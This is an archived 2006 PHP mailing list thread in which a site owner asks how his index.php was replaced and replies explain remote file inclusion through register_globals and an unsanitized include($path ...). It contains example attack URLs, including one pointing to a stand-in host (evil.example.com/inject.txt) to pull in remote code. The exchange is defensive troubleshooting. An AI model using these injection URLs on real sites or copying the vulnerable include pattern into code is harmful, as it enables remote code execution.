Re: Highjack?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST) are automatically populated into variables.  With that in mind    www.example.com/index.php?path=remoteexplot.com/ would then yield include('remoteexplit.com/foo');  thus including ANY code they wish.

----- Original Message ----
From: bruce <bedouglas@xxxxxxxxxxxxx>
To: Eric Butera <digital.tarsier@xxxxxxxxx>; tedd <tedd@xxxxxxxxxxxx>
Cc: PHP General List <php-general@xxxxxxxxxxxxx>
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE:  Highjack?

eric...

you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks



-----Original Message-----
From: Eric Butera [mailto:digital.tarsier@xxxxxxxxx]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re:  Highjack?


On 11/13/06, tedd <tedd@xxxxxxxxxxxx> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com  http://ancientstones.com  http://earthstones.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>

Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php





-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux